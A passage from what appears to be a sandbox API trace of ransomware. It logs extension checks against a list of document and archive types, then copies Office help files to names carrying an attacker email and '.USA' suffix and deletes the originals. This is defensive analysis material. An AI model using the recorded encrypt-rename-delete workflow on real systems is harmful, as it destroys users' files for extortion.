Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0272.453] lstrlenW (lpString=".jpg") returned 4 [0272.453] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0272.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0272.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0272.453] lstrlenW (lpString=".doc") returned 4 [0272.453] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0272.453] lstrlenW (lpString=".docx") returned 5 [0272.453] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1 [0272.453] lstrlenW (lpString=".pdf") returned 4 [0272.453] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0272.453] lstrlenW (lpString=".xls") returned 4 [0272.453] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0272.453] lstrlenW (lpString=".xlsx") returned 5 [0272.453] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1 [0272.453] lstrlenW (lpString=".ppt") returned 4 [0272.453] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0272.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0272.453] lstrlenW (lpString=".zip") returned 4 [0272.453] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0272.453] lstrlenW (lpString=".rar") returned 4 [0272.453] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0272.453] lstrlenW (lpString=".bz2") returned 4 [0272.453] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0272.453] lstrlenW (lpString=".7z") returned 3 [0272.453] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0272.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0272.453] lstrlenW (lpString=".dbf") returned 4 [0272.453] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0272.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0272.454] lstrlenW (lpString=".1cd") returned 4 [0272.454] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0272.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59 [0272.454] lstrlenW (lpString=".jpg") returned 4 [0272.454] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0272.454] lstrcmpiW (lpString1=".HXS", lpString2=".USA") returned -1 [0272.454] lstrlenW (lpString="EXCEL.DEV.HXS") returned 13 [0272.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.699] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=7024126) returned 1 [0272.699] CloseHandle (hObject=0x388) returned 1 [0272.699] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev.hxs")) returned 0x20 [0272.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev.hxs.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.728] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev.hxs.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0272.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61 [0272.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61 [0272.728] lstrlenW (lpString=".doc") returned 4 [0272.728] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0272.728] lstrlenW (lpString=".docx") returned 5 [0272.728] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1 [0272.728] lstrlenW (lpString=".pdf") returned 4 [0272.728] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0272.728] lstrlenW (lpString=".xls") returned 4 [0272.728] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0272.728] lstrlenW (lpString=".xlsx") returned 5 [0272.728] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1 [0272.728] lstrlenW (lpString=".ppt") returned 4 [0272.728] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0272.728] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61 [0272.728] lstrlenW (lpString=".zip") returned 4 [0272.728] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0272.728] lstrlenW (lpString=".rar") returned 4 [0272.728] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0272.728] lstrlenW (lpString=".bz2") returned 4 [0272.728] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0272.729] lstrlenW (lpString=".7z") returned 3 [0272.729] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0272.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61 [0272.729] lstrlenW (lpString=".dbf") returned 4 [0272.729] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0272.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61 [0272.729] lstrlenW (lpString=".1cd") returned 4 [0272.729] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0272.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61 [0272.729] lstrlenW (lpString=".jpg") returned 4 [0272.729] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1 [0272.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61 [0272.729] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61 [0272.729] lstrlenW (lpString=".doc") returned 4 [0272.729] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0272.729] lstrlenW (lpString=".docx") returned 5 [0272.729] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1 [0272.729] lstrlenW (lpString=".pdf") returned 4 [0272.729] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0272.729] lstrlenW (lpString=".xls") returned 4 [0272.729] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0272.729] lstrlenW (lpString=".xlsx") returned 5 [0272.729] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1 [0272.729] lstrlenW (lpString=".ppt") returned 4 [0272.730] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0272.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61 [0272.730] lstrlenW (lpString=".zip") returned 4 [0272.730] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0272.730] lstrlenW (lpString=".rar") returned 4 [0272.730] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0272.730] lstrlenW (lpString=".bz2") returned 4 [0272.730] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0272.730] lstrlenW (lpString=".7z") returned 3 [0272.730] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0272.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61 [0272.730] lstrlenW (lpString=".dbf") returned 4 [0272.730] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0272.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61 [0272.730] lstrlenW (lpString=".1cd") returned 4 [0272.730] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0272.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61 [0272.730] lstrlenW (lpString=".jpg") returned 4 [0272.730] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1 [0272.730] lstrcmpiW (lpString1=".HXK", lpString2=".USA") returned -1 [0272.730] lstrlenW (lpString="EXCEL.DEV_F_COL.HXK") returned 19 [0272.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.737] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=114) returned 1 [0272.738] CloseHandle (hObject=0x2bc) returned 1 [0272.738] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_f_col.hxk")) returned 0x20 [0272.740] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_f_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.746] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.746] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_f_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.758] GetLastError () returned 0x0 [0272.760] ReadFile (in: hFile=0x2bc, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x72, lpOverlapped=0x0) returned 1 [0272.771] WriteFile (in: hFile=0x3a4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x80, lpOverlapped=0x0) returned 1 [0272.772] ReadFile (in: hFile=0x2bc, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.772] WriteFile (in: hFile=0x3a4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xfa, lpOverlapped=0x0) returned 1 [0272.772] SetEndOfFile (hFile=0x3a4) returned 1 [0272.772] CloseHandle (hObject=0x3a4) returned 1 [0272.772] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.772] SetEndOfFile (hFile=0x2bc) returned 1 [0272.774] CloseHandle (hObject=0x2bc) returned 1 [0272.774] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.774] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_f_col.hxk")) returned 1 [0272.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67 [0272.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67 [0272.775] lstrlenW (lpString=".doc") returned 4 [0272.775] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0272.775] lstrlenW (lpString=".docx") returned 5 [0272.775] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0272.775] lstrlenW (lpString=".pdf") returned 4 [0272.775] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0272.775] lstrlenW (lpString=".xls") returned 4 [0272.775] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0272.775] lstrlenW (lpString=".xlsx") returned 5 [0272.775] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0272.775] lstrlenW (lpString=".ppt") returned 4 [0272.775] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0272.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67 [0272.775] lstrlenW (lpString=".zip") returned 4 [0272.775] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0272.775] lstrlenW (lpString=".rar") returned 4 [0272.775] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0272.775] lstrlenW (lpString=".bz2") returned 4 [0272.775] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0272.775] lstrlenW (lpString=".7z") returned 3 [0272.775] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0272.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67 [0272.775] lstrlenW (lpString=".dbf") returned 4 [0272.775] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0272.775] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67 [0272.775] lstrlenW (lpString=".1cd") returned 4 [0272.775] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0272.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67 [0272.872] lstrlenW (lpString=".jpg") returned 4 [0272.872] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0272.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67 [0272.872] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67 [0272.872] lstrlenW (lpString=".doc") returned 4 [0272.873] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0272.873] lstrlenW (lpString=".docx") returned 5 [0272.873] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0272.873] lstrlenW (lpString=".pdf") returned 4 [0272.873] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0272.873] lstrlenW (lpString=".xls") returned 4 [0272.873] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0272.873] lstrlenW (lpString=".xlsx") returned 5 [0272.873] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0272.873] lstrlenW (lpString=".ppt") returned 4 [0272.873] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0272.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67 [0272.873] lstrlenW (lpString=".zip") returned 4 [0272.873] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0272.873] lstrlenW (lpString=".rar") returned 4 [0272.873] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0272.873] lstrlenW (lpString=".bz2") returned 4 [0272.873] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0272.873] lstrlenW (lpString=".7z") returned 3 [0272.873] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0272.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67 [0272.873] lstrlenW (lpString=".dbf") returned 4 [0272.873] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0272.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67 [0272.873] lstrlenW (lpString=".1cd") returned 4 [0272.873] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0272.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_F_COL.HXK") returned 67 [0272.873] lstrlenW (lpString=".jpg") returned 4 [0272.873] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0272.874] lstrcmpiW (lpString1=".HXK", lpString2=".USA") returned -1 [0272.874] lstrlenW (lpString="EXCEL.DEV_K_COL.HXK") returned 19 [0272.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.874] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=113) returned 1 [0272.874] CloseHandle (hObject=0x2bc) returned 1 [0272.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_k_col.hxk")) returned 0x20 [0272.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_k_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.874] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.874] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_k_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.875] GetLastError () returned 0x0 [0272.875] ReadFile (in: hFile=0x2bc, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x71, lpOverlapped=0x0) returned 1 [0272.875] WriteFile (in: hFile=0x3a4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x80, lpOverlapped=0x0) returned 1 [0272.876] ReadFile (in: hFile=0x2bc, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.876] WriteFile (in: hFile=0x3a4, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xfa, lpOverlapped=0x0) returned 1 [0272.876] SetEndOfFile (hFile=0x3a4) returned 1 [0272.876] CloseHandle (hObject=0x3a4) returned 1 [0272.876] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.876] SetEndOfFile (hFile=0x2bc) returned 1 [0272.878] CloseHandle (hObject=0x2bc) returned 1 [0272.878] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.879] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_k_col.hxk")) returned 1 [0272.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67 [0272.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67 [0272.879] lstrlenW (lpString=".doc") returned 4 [0272.879] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0272.879] lstrlenW (lpString=".docx") returned 5 [0272.879] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0272.879] lstrlenW (lpString=".pdf") returned 4 [0272.879] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0272.879] lstrlenW (lpString=".xls") returned 4 [0272.879] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0272.879] lstrlenW (lpString=".xlsx") returned 5 [0272.879] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0272.879] lstrlenW (lpString=".ppt") returned 4 [0272.879] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0272.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67 [0272.879] lstrlenW (lpString=".zip") returned 4 [0272.879] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0272.879] lstrlenW (lpString=".rar") returned 4 [0272.879] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0272.879] lstrlenW (lpString=".bz2") returned 4 [0272.879] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0272.879] lstrlenW (lpString=".7z") returned 3 [0272.879] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0272.879] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67 [0272.879] lstrlenW (lpString=".dbf") returned 4 [0272.880] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0272.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67 [0272.880] lstrlenW (lpString=".1cd") returned 4 [0272.880] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0272.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67 [0272.880] lstrlenW (lpString=".jpg") returned 4 [0272.880] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0272.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67 [0272.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67 [0272.880] lstrlenW (lpString=".doc") returned 4 [0272.880] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0272.880] lstrlenW (lpString=".docx") returned 5 [0272.880] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0272.880] lstrlenW (lpString=".pdf") returned 4 [0272.880] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0272.880] lstrlenW (lpString=".xls") returned 4 [0272.880] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0272.880] lstrlenW (lpString=".xlsx") returned 5 [0272.880] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0272.880] lstrlenW (lpString=".ppt") returned 4 [0272.880] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0272.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67 [0272.880] lstrlenW (lpString=".zip") returned 4 [0272.880] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0272.880] lstrlenW (lpString=".rar") returned 4 [0272.880] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0272.880] lstrlenW (lpString=".bz2") returned 4 [0272.880] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0272.880] lstrlenW (lpString=".7z") returned 3 [0272.880] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0272.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67 [0272.881] lstrlenW (lpString=".dbf") returned 4 [0272.881] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0272.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67 [0272.881] lstrlenW (lpString=".1cd") returned 4 [0272.881] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0272.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_K_COL.HXK") returned 67 [0272.881] lstrlenW (lpString=".jpg") returned 4 [0272.881] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0272.881] lstrcmpiW (lpString1=".HXS", lpString2=".USA") returned -1 [0272.881] lstrlenW (lpString="EXCEL.HXS") returned 9 [0272.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.881] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=7827686) returned 1 [0272.881] CloseHandle (hObject=0x2bc) returned 1 [0272.881] GetFileAttributesW (lpFileName="C:\\Program 